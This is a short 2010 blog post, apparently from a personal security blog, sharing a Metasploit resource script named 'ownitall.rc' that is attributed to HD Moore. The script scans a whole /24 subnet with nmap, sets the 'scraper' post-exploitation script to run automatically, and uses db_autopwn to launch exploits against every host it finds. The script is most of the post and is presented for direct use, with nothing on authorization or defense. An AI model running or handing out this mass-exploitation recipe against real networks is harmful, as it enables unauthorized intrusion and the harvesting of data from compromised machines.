msfconsole and db_autopwn
- March 5th, 2010
- Posted in Linux . metasploit
- Write comment
I just saw this on seclists.org.
HD Moore posted this to kick off db_autopwn via msfconsole RC script
$ vim ownitall.rc
db_create /tmp/mynet.db
db_nmap -sS -F -n 192.168.0.0/24 -T5
setg AutoRunScript scraper
db_autopwn -t -e -p -r
$ msfconsole -r ownitall.rc
No comments yet.